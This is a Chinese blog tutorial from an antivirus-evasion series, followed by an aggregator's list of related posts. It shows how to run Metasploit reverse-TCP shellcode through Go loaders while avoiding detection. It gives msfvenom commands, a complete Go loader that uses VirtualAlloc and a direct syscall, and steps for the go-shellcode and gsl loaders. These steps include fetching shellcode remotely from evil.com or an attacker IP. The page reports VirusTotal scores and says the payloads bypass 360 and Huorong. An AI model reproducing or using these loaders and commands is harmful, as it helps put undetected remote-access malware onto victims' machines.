Agan '
Agan '

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

0x01 GO加载shellcode介绍

0x02 Go嵌入shellcode(VT查杀率3/71)

0x03 Go加载器

go-shellcode加载器(VT查杀率4/69)

gsl加载器(VT查杀率6/71)

                                                                                       免杀能力一览表

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第1张图片

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第2张图片

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第3张图片

 

0x01 GO加载shellcode介绍

用Golang做免杀的不是很多,不过也有一些go写的免杀工具,比如专题21里介绍的HERCULES就是把利用go来嵌入shellcode然后编译exe,还有veil、Avoidz都可以生成基于go语言的shellcode,而且免杀效果还不错。

唯一不足的是go编译出来的exe大约2.3M左右,使用upx压缩下大约1.5M,不过相比python编译的exe应该还能接受了,免杀效果还比python-exe要好一些。

Golang也可以分两种方式,一种是将shellcode嵌入go代码然后编译exe,一种是使用go加载器。

 

0x02 Go嵌入shellcode(VT查杀率3/71)

Go中嵌入shellcode的方法不大多,只找到了两种代码,相比python要少很多,也可能是因为毕竟少的缘故,所以免杀效果还是比较好的。

先用msfvenom生成C语言的shellcode,注意要生成x64的。

msfvenom -p  windows/x64/meterpreter/reverse_tcp  lhost=10.211.55.2 lport=3333 -f c

将shellcode转换一下,变成下面的格式

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第4张图片

image.png

将转换后的shellcode替换到下面的shellcode_buf位置,文件保存为shell.go

package main

import (
    "io/ioutil"
    "os"
    "syscall"
    "unsafe"
)

const (
    MEM_COMMIT             = 0x1000
    MEM_RESERVE            = 0x2000
    PAGE_EXECUTE_READWRITE = 0x40
)

var (
    kernel32       = syscall.MustLoadDLL("kernel32.dll")
    ntdll          = syscall.MustLoadDLL("ntdll.dll")
    VirtualAlloc   = kernel32.MustFindProc("VirtualAlloc")
    RtlCopyMemory  = ntdll.MustFindProc("RtlCopyMemory")
    shellcode_buf = []byte{ 
        0xfc, 0x48,  ----shellcode----, 0xd5,
    }
)

func checkErr(err error) {
    if err != nil {
        if err.Error() != "The operation completed successfully." {
            println(err.Error())
            os.Exit(1)
        }
    }
}

func main() {
    shellcode := shellcode_buf
    if len(os.Args) > 1 {
        shellcodeFileData, err := ioutil.ReadFile(os.Args[1])
        checkErr(err)
        shellcode = shellcodeFileData
    }

    addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    if addr == 0 {
        checkErr(err)
    }
    _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
    checkErr(err)
    syscall.Syscall(addr, 0, 0, 0, 0)
}

 

安装golang,参考:[https://www.runoob.com/go/go-environment.html](https://www.runoob.com/go/go-environment.html)

在命令行执行命令go build,编译生成test.exe,在测试机执行。不过大约两分钟后,360安全大脑提示云查杀报警了。

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第5张图片

msf中监听windows/x64/meterpreter/reverse_tcp,可上线

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第6张图片

virustotal.com上查杀率为3/71

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第7张图片

在网上还找到另外一个代码,不过执行和编译老出错,有兴趣的可以试一下,代码如下。

package main

import "C"
import "unsafe"

func main() {
    buf := ""
    buf += "xddxc6xd9x74x24xf4x5fx33xc9xb8xb3x5ex2c"
    ...省略...
    buf += "xc9xb1x97x31x47x1ax03x47x1ax83xc7x04xe2"
    // at your call site, you can send the shellcode directly to the C
    // function by converting it to a pointer of the correct type.
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}

 

0x03 Go加载器

go-shellcode加载器(VT查杀率4/69)

需要先下载加载器:[https://github.com/brimstone/go-shellcode](https://github.com/brimstone/go-shellcode)

下载后,进入go-shellcode\cmd\sc目录,执行go build

生成sc.exe

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第8张图片

然后用Msfvenom生成hex格式的shellcode​​​​​​​

msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o shell.hex LHOST=10.211.55.2 LPORT=3333

使用sc加载器进行加载​​​​​​​

sc.exe shellcode

静态和动态都可过360和火绒

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第9张图片

msf中可上线

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第10张图片

virustotal.com上sc.exe查杀率为4/69

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第11张图片

gsl加载器(VT查杀率6/71)

gsl是Jayl1n根据go-shellcode进行了修改完善的工具。

下载gsl加载器:wget [https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip](https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip)

里面包含两个版本,x86和x64。

提供了三种加载方式

1、从参数传入 (必须是HEX格式)

gsl -s SHELLCODE -hex

2、从文件传入

加载 RAW 格式:gsl -f shell.raw

加载 HEX 格式:gsl -f shell.hex -hex

3、从远程服务器加载

把 SHELLCODE 文件挂在WEB目录下。(支持HTTP/HTTPS)

加载 RAW 格式:gsl -u [http://evil.com/shell.raw](http://evil.com/shell.raw)

加载 HEX 格式:gsl -u [http://evil.com/shell.hex](http://evil.com/shell.hex) -hex

以x64为例进行测试,先生成x64的shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp  LHOST=10.211.55.2 LPORT=3333 -f hex -o shell.hex

我就试一下远程加载gsl64.exe -u [http://10.211.55.2/shell.hex](http://10.211.55.2/shell.hex) -hex

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第12张图片

msf中可上线

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第13张图片

virustotal.com上gsl64.exe查杀率为6/71,因为这个gsl是编译好的,没法自己编译,估计越来越多的杀软都能开始查杀。

【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)_第14张图片

 

参考链接:

payload免杀:[https://www.cnblogs.com/LyShark/p/11331476.html](https://www.cnblogs.com/LyShark/p/11331476.html)

基于Ruby内存加载shellcode:[https://micro8.gitbook.io/micro8/contents-1/61-70/68-ji-yu-ruby-nei-cun-jia-zai-shellcode-di-yi-ji](https://micro8.gitbook.io/micro8/contents-1/61-70/68-ji-yu-ruby-nei-cun-jia-zai-shellcode-di-yi-ji)

go-shellcode:[https://github.com/brimstone/go-shellcode](https://github.com/brimstone/go-shellcode)

从内存加载 SHELLCODE 绕过AV查杀:[https://jayl1n.github.io/2019/01/08/tools-load-shellcode/](https://jayl1n.github.io/2019/01/08/tools-load-shellcode/)

 

 

 

 

 

 

 

 

 

 

 

 

 

你可能感兴趣的:(免杀篇)

  • 【免杀篇】远控免杀专题(69)-Mimikatz的18种免杀姿势及防御策略(下) Agan ' 免杀篇免杀
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录方法11-用C#加载mimikatz(VT查杀率35/73)方法12-JS加载mimikatz(VT查杀率22/59)方法13-msiexec加载mimikatz(VT查杀率25/60)方法14-白名单msbuild.exe加载(VT查杀率4/59)方法15-JScript的xsl版(VT查杀率7/60)方法16-jscript的sct版(VT
  • 【免杀篇】远控免杀专题(67)-白名单(113个)总结篇 Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01关于白名单程序0x02本文内容摘要0x03执行命令类(已测试33个)MSBuild.exeInstallUtil.exeMshta.exeRundll32.exeRegsvr32.exeCmstp.exeFtp.exeRegasm.exe/Regsvcs.exeCompiler.exeMavInject.exepresentationh
  • 【免杀篇】远控免杀专题(70)-终结篇 Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02文章概览0x03免杀能力一览0x04参考资料完结转载的免杀教程,结束了......,当然后续原文作者还更新的话也会对应的更新上来,其次最近开始在研究免杀,如果博客粉丝达到10000+人,分享一篇未公开的免杀加载器源码+利用方法,前天刚试过,能过360和火绒和一些常规杀软。0x01前言本系列文章从2019年12月底开始,原计划
  • 【免杀篇】远控免杀专题(66)-工具篇总结 Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02免杀效果概览0x03工具免杀3.1Veil免杀(VT免杀率23/71)3.1.1使用veil直接生成exe(VT查杀率44/70)3.1.2使用veil+mingw-w64(VT查杀率23/71)3.2Venom免杀(VT免杀率11/71)3.3Shellter免杀(VT免杀率7/69)3.4BackDoor-Factory
  • 【免杀篇】远控免杀专题(26)-C、C++加载shellcode免杀(上) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C/C++加载shellcode免杀介绍0x02C/C++源码编译方法1:指针执行(VT免杀率23/71)方法2:申请动态内存加载(VT免杀率24/71)方法3:嵌入汇编加载(VT免杀率12/71)方法4:强制类型转换(VT免杀率9/70)方法5:汇编花指令(VT免杀率12/69)本文目录:(由于内容较多篇幅较长,分成了上中下三篇文章)
  • 【免杀篇】远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02生成hta(VT查杀率14/59)0x03生成install_util(VT查杀率12/71)0x04小结免杀能力一览表几点说明:1、下表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp
  • 【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Unicorn介绍0x02安装Unicorn0x03Unicorn使用说明0x04利用Unicorn生成后门0x05小结免杀能力一览表0x01Unicorn介绍MagicUnicorn是一个比较简单的小工具,主要是基于MatthewGraeber提出的PowerShell攻击技术以及DavidKennedy和JoshKelly提出的po
  • 【免杀篇】远控免杀专题(27)-C、C++加载shellcode免杀(中) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C/C++加载shellcode免杀介绍方法6:XOR加密(VT免杀率15/71)方法7:base64加密法1(VT免杀率28/69)方法8:base64加密法2(VT免杀率28/69)方法9:python变形shellcode+汇编代码(VT免杀率8/70)方法10:python+xor处理(VT免杀率15/69)本文目录:(由于内容
  • 【免杀篇】远控免杀专题(21)-HERCULES免杀(VT免杀率14/56) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01HERCULES介绍0x02安装HERCULES安装前的准备安装HERCULES安装可能遇到的问题0x03HERCULES使用说明0x04利用HERCULES生成后门0x05HERCULES小结免杀能力一览表0x01HERCULES介绍HERCULES,2017年的免杀工具,可以直接生成msf可用的payload并进行免杀,也可以对自定
  • 【免杀篇】远控免杀专题(7)-Shellter免杀(VT免杀率7/69) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02安装Shellter0x03生成payload(VT免杀率7/69)0x04小结免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。3、由于本机测试
  • 【免杀篇】远控免杀专题文章(1)-基础篇 Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录远控免杀专题文章(1)-基础篇免杀概念杀毒软件检测方式扫描技术监控技术扫描引擎特征码扫描文件校验和法进程行为监测法(沙盒模式)主动防御技术机器学习识别技术免杀技术发展史免杀技术介绍1.修改特征码2.花指令免杀3.加壳免杀4.内存免杀5.二次编译6.分离免杀7.资源修改参考远控免杀专题文章(1)-基础篇前言一直是从事web安全多一些,对waf绕过
  • 【免杀篇】远控免杀专题(33)-Ruby加载shellcode免杀(VT免杀率0-58) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Ruby加载shellcode介绍0x02Ruby嵌入shellcode(VT查杀率0/58)免杀能力一览表0x01Ruby加载shellcode介绍Ruby做免杀的不是很多,目前好像只遇到专题5中介绍的veil使用了ruby编译exe来进行免杀,目前也没发现基于ruby的shellcode加载器,只找到了一种ruby嵌入shellco
  • 【免杀篇】远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率 Agan ' 免杀篇免杀
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Python加载shellcode免杀介绍0x02通过py源码编译exe方法1:python加载C代码(VT免杀率19/70)方法2:py2exe打包编译exe(VT免杀率10/69)方法3:base64编码(VT免杀率16/70)方法4:py+C编译exe(VT免杀率18/69)方法5:xor加密(VT免杀率19/71)方法6:aes
  • 【免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01GO加载shellcode介绍0x02Go嵌入shellcode(VT查杀率3/71)0x03Go加载器go-shellcode加载器(VT查杀率4/69)gsl加载器(VT查杀率6/71)免杀能力一览表0x01GO加载shellcode介绍用Golang做免杀的不是很多,不过也有一些go写的免杀工具,比如专题21里介绍的HERCULE
  • 【免杀篇】远控免杀专题(22)-SpookFlare免杀(VT免杀率16/67) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01SpookFlare介绍0x02安装SpookFlare0x03SpookFlare使用说明0x04利用SpookFlare生成后门0x05SpookFlare小结免杀能力一览表0x01SpookFlare介绍SpookFlare,2018年开源的工具,目前还在更新,使用了多种方式进行bypass。可直接生成基于Meterpreter、
  • 【免杀篇】远控免杀专题(53)-白名单WMIC.exe执行payload Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01WMIC介绍0x02WMIC使用0x03使用WMIC远程加载payload利用metasploit自定义免杀0x01WMIC介绍WMIC扩展WMI(WindowsManagementInstrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使
  • 【免杀篇】远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01powershell加载shellcode介绍0x02powershell的几个基础知识powershell版本问题常见执行方式执行策略0x03powershell加载shellcode方法1:msf-ps1本地执行(VT免杀率18/56)方法2:Invoke-Shellcode加载(VT免杀率0/58)方法3:Invoke-Obfus
  • 【免杀篇】远控免杀专题(28)-C、C++加载shellcode免杀(下) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C/C++加载shellcode免杀介绍0x02使用shellcode加载器使用shellcode_launcher(VT免杀率3/71)使用SSI加载(VT免杀率6/69)本文目录:(由于内容较多篇幅较长,分成了上中下三篇文章)免杀能力一览表0x01C/C++加载shellcode免杀介绍在此之前对各种常见免杀工具进行了介绍,也可以从
  • 【免杀篇】远控免杀专题(68)-Mimikatz的18种免杀姿势及防御策略(上) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02免杀介绍0x03mimikatz免杀实践方法0-原生态mimikatz.exe(VT查杀率55/71)方法1-加壳+签名+资源替换(VT查杀率9/70)方法2-Invoke-Mimikatz(VT查杀率39/58)方法3-使用Out-EncryptedScript加密(VT查杀率0/60)方法4-使用xencrypt加密(V
  • 【免杀篇】远控免杀专题(65)-shellcode免杀实践补充 Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02直接生成可执行文件0x03加密shellcode后生成可执行文件0x04dll劫持白加黑方式免杀流程图具体操作0x05利用工具自动劫持劫持微信演示0x06利用远程线程注入shellcode混淆免杀详细操作0x01前言最近在研究shellcode的免杀技术,因本人以前主要是搞逆向的,shellcode免杀方面还是个小白,所以就
  • 【免杀篇】远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70) Agan ' 免杀篇
    当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C#加载shellcode免杀介绍0x02C#源码直接编译exe方法1:C#+shellcode直接编译(VT免杀率20/71)方法2:C#+加密处理shellcode免杀(VT免杀率8/70)方法3:XOR/AES编码shellcode(VT免杀率14/71)0x03加载器加载C#代码方法4:使用CSC+InstallUtil执行sh
  • Js函数返回值 _wy_ jsreturn
    一、返回控制与函数结果,语法为:return 表达式;作用: 结束函数执行,返回调用函数,而且把表达式的值作为函数的结果 二、返回控制语法为:return;作用: 结束函数执行,返回调用函数,而且把undefined作为函数的结果 在大多数情况下,为事件处理函数返回false,可以防止默认的事件行为.例如,默认情况下点击一个<a>元素,页面会跳转到该元素href属性
  • MySQL 的 char 与 varchar bylijinnan mysql
    今天发现,create table 时,MySQL 4.1有时会把 char 自动转换成 varchar 测试举例: CREATE TABLE `varcharLessThan4` ( `lastName` varchar(3) ) ; mysql> desc varcharLessThan4; +----------+---------+------+-
  • Quartz——TriggerListener和JobListener eksliang TriggerListenerJobListenerquartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208624 一.概述 listener是一个监听器对象,用于监听scheduler中发生的事件,然后执行相应的操作;你可能已经猜到了,TriggerListeners接受与trigger相关的事件,JobListeners接受与jobs相关的事件。   二.JobListener监听器  j
  • oracle层次查询 18289753290 oracle;层次查询;树查询
    .oracle层次查询(connect  by) oracle的emp表中包含了一列mgr指出谁是雇员的经理,由于经理也是雇员,所以经理的信息也存储在emp表中。这样emp表就是一个自引用表,表中的mgr列是一个自引用列,它指向emp表中的empno列,mgr表示一个员工的管理者, select   empno,mgr,ename,sal  from e
  • 通过反射把map中的属性赋值到实体类bean对象中 酷的飞上天空 javaee泛型类型转换
    使用过struts2后感觉最方便的就是这个框架能自动把表单的参数赋值到action里面的对象中 但现在主要使用Spring框架的MVC,虽然也有@ModelAttribute可以使用但是明显感觉不方便。 好吧,那就自己再造一个轮子吧。 原理都知道,就是利用反射进行字段的赋值,下面贴代码 主要类如下:   import java.lang.reflect.Field; imp
  • SAP HANA数据存储:传统硬盘的瓶颈问题 蓝儿唯美 HANA
    SAPHANA平台有各种各样的应用场景,这也意味着客户的实施方法有许多种选择,关键是如何挑选最适合他们需求的实施方案。 在 《Implementing SAP HANA》这本书中,介绍了SAP平台在现实场景中的运作原理,并给出了实施建议和成功案例供参考。本系列文章节选自《Implementing SAP HANA》,介绍了行存储和列存储的各自特点,以及SAP HANA的数据存储方式如何提升空间压
  • Java Socket 多线程实现文件传输 随便小屋 javasocket
            高级操作系统作业,让用Socket实现文件传输,有些代码也是在网上找的,写的不好,如果大家能用就用上。 客户端类:   package edu.logic.client; import java.io.BufferedInputStream; import java.io.Buffered
  • java初学者路径 aijuans java
    学习Java有没有什么捷径?要想学好Java,首先要知道Java的大致分类。自从Sun推出Java以来,就力图使之无所不包,所以Java发展到现在,按应用来分主要分为三大块:J2SE,J2ME和J2EE,这也就是Sun ONE(Open Net Environment)体系。J2SE就是Java2的标准版,主要用于桌面应用软件的编程;J2ME主要应用于嵌入是系统开发,如手机和PDA的编程;J2EE
  • APP推广 aoyouzi APP推广
    一,免费篇 1,APP推荐类网站自主推荐 最美应用、酷安网、DEMO8、木蚂蚁发现频道等,如果产品独特新颖,还能获取最美应用的评测推荐。PS:推荐简单。只要产品有趣好玩,用户会自主分享传播。例如足迹APP在最美应用推荐一次,几天用户暴增将服务器击垮。 2,各大应用商店首发合作 老实盯着排期,多给应用市场官方负责人献殷勤。 3,论坛贴吧推广 百度知道,百度贴吧,猫扑论坛,天涯社区,豆瓣(
  • JSP转发与重定向 百合不是茶 jspservletJava Webjsp转发
      在servlet和jsp中我们经常需要请求,这时就需要用到转发和重定向;   转发包括;forward和include     例子;forwrad转发;  将请求装法给reg.html页面   关键代码;    req.getRequestDispatcher("reg.html
  • web.xml之jsp-config bijian1013 javaweb.xmlservletjsp-config
    1.作用:主要用于设定JSP页面的相关配置。 2.常见定义: <jsp-config> <taglib> <taglib-uri>URI(定义TLD文件的URI,JSP页面的tablib命令可以经由此URI获取到TLD文件)</tablib-uri> <taglib-location> TLD文件所在的位置
  • JSF2.2 ViewScoped Using CDI sunjing CDIJSF 2.2ViewScoped
    JSF 2.0 introduced annotation @ViewScoped; A bean annotated with this scope maintained its state as long as the user stays on the same view(reloads or navigation - no intervening views). One problem w
  • 【分布式数据一致性二】Zookeeper数据读写一致性 bit1129 zookeeper
    很多文档说Zookeeper是强一致性保证,事实不然。关于一致性模型请参考http://bit1129.iteye.com/blog/2155336    Zookeeper的数据同步协议 Zookeeper采用称为Quorum Based Protocol的数据同步协议。假如Zookeeper集群有N台Zookeeper服务器(N通常取奇数,3台能够满足数据可靠性同时
  • Java开发笔记 白糖_ java开发
    1、Map<key,value>的remove方法只能识别相同类型的key值   Map<Integer,String> map = new HashMap<Integer,String>(); map.put(1,"a"); map.put(2,"b"); map.put(3,"c"
  • 图片黑色阴影 bozch 图片
     .event{ padding:0;    width:460px;    min-width: 460px;    border:0px solid #e4e4e4;    height: 350px;    min-heig
  • 编程之美-饮料供货-动态规划 bylijinnan 动态规划
    import java.util.Arrays; import java.util.Random; public class BeverageSupply { /** * 编程之美 饮料供货 * 设Opt(V’,i)表示从i到n-1种饮料中,总容量为V’的方案中,满意度之和的最大值。 * 那么递归式就应该是:Opt(V’,i)=max{ k * Hi+Op
  • ajax大参数(大数据)提交性能分析 chenbowen00 WebAjax框架浏览器prototype
    近期在项目中发现如下一个问题 项目中有个提交现场事件的功能,该功能主要是在web客户端保存现场数据(主要有截屏,终端日志等信息)然后提交到服务器上方便我们分析定位问题。客户在使用该功能的过程中反应点击提交后反应很慢,大概要等10到20秒的时间浏览器才能操作,期间页面不响应事件。 根据客户描述分析了下的代码流程,很简单,主要通过OCX控件截屏,在将前端的日志等文件使用OCX控件打包,在将之转换为
  • [宇宙与天文]在太空采矿,在太空建造 comsci
         我们在太空进行工业活动...但是不太可能把太空工业产品又运回到地面上进行加工,而一般是在哪里开采,就在哪里加工,太空的微重力环境,可能会使我们的工业产品的制造尺度非常巨大....      地球上制造的最大工业机器是超级油轮和航空母舰,再大些就会遇到困难了,但是在空间船坞中,制造的最大工业机器,可能就没
  • ORACLE中CONSTRAINT的四对属性 daizj oracleCONSTRAINT
    ORACLE中CONSTRAINT的四对属性 summary:在data migrate时,某些表的约束总是困扰着我们,让我们的migratet举步维艰,如何利用约束本身的属性来处理这些问题呢?本文详细介绍了约束的四对属性: Deferrable/not deferrable, Deferred/immediate, enalbe/disable, validate/novalidate,以及如
  • Gradle入门教程 dengkane gradle
    一、寻找gradle的历程 一开始的时候,我们只有一个工程,所有要用到的jar包都放到工程目录下面,时间长了,工程越来越大,使用到的jar包也越来越多,难以理解jar之间的依赖关系。再后来我们把旧的工程拆分到不同的工程里,靠ide来管理工程之间的依赖关系,各工程下的jar包依赖是杂乱的。一段时间后,我们发现用ide来管理项程很不方便,比如不方便脱离ide自动构建,于是我们写自己的ant脚本。再后
  • C语言简单循环示例 dcj3sjt126com c
    # include <stdio.h> int main(void) { int i; int count = 0; int sum = 0; float avg; for (i=1; i<=100; i++) { if (i%2==0) { count++; sum += i; } } avg
  • presentModalViewController 的动画效果 dcj3sjt126com controller
    系统自带(四种效果): presentModalViewController模态的动画效果设置:     [cpp]  view plain copy   UIViewController *detailViewController = [[UIViewController al
  • java 二分查找 shuizhaosi888 二分查找java二分查找
    需求:在排好顺序的一串数字中,找到数字T   一般解法:从左到右扫描数据,其运行花费线性时间O(N)。然而这个算法并没有用到该表已经排序的事实。 /** * * @param array * 顺序数组 * @param t * 要查找对象 * @return */ public stati
  • Spring Security(07)——缓存UserDetails 234390216 ehcache缓存Spring Security
           Spring Security提供了一个实现了可以缓存UserDetails的UserDetailsService实现类,CachingUserDetailsService。该类的构造接收一个用于真正加载UserDetails的UserDetailsService实现类。当需要加载UserDetails时,其首先会从缓存中获取,如果缓存中没
  • Dozer 深层次复制 jayluns VOmavenpo
    最近在做项目上遇到了一些小问题,因为架构在做设计的时候web前段展示用到了vo层,而在后台进行与数据库层操作的时候用到的是Po层。这样在业务层返回vo到控制层,每一次都需要从po-->转化到vo层,用到BeanUtils.copyProperties(source, target)只能复制简单的属性,因为实体类都配置了hibernate那些关联关系,所以它满足不了现在的需求,但后发现还有个很
  • CSS规范整理(摘自懒人图库) a409435341 htmlUIcss浏览器
       刚没事闲着在网上瞎逛,找了一篇CSS规范整理,粗略看了一下后还蛮有一定的道理,并自问是否有这样的规范,这也是初入前端开发的人一个很好的规范吧。 一、文件规范 1、文件均归档至约定的目录中。 具体要求通过豆瓣的CSS规范进行讲解: 所有的CSS分为两大类:通用类和业务类。通用的CSS文件,放在如下目录中: 基本样式库 /css/core
  • C++动态链接库创建与使用 你不认识的休道人 C++dll
    一、创建动态链接库 1.新建工程test中选择”MFC [dll]”dll类型选择第二项"Regular DLL With MFC shared linked",完成 2.在test.h中添加 extern “C” 返回类型 _declspec(dllexport)函数名(参数列表); 3.在test.cpp中最后写 extern “C” 返回类型 _decls
  • Android代码混淆之ProGuard rensanning ProGuard
    Android应用的Java代码,通过反编译apk文件(dex2jar、apktool)很容易得到源代码,所以在release版本的apk中一定要混淆一下一些关键的Java源码。 ProGuard是一个开源的Java代码混淆器(obfuscation)。ADT r8开始它被默认集成到了Android SDK中。 官网: http://proguard.sourceforge.net/
  • 程序员在编程中遇到的奇葩弱智问题 tomcat_oracle jquery编程ide
      现在收集一下:         排名不分先后,按照发言顺序来的。   1、Jquery插件一个通用函数一直报错,尤其是很明显是存在的函数,很有可能就是你没有引入jquery。。。或者版本不对 2、调试半天没变化:不在同一个文件中调试。这个很可怕,我们很多时候会备份好几个项目,改完发现改错了。有个群友说的好:   在汤匙
  • 解决maven-dependency-plugin (goals "copy-dependencies","unpack") is not supported xp9802 dependency
    解决办法:在plugins之前添加如下pluginManagement,二者前后顺序如下:   [html]  view plain copy   <build>           <pluginManagement
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他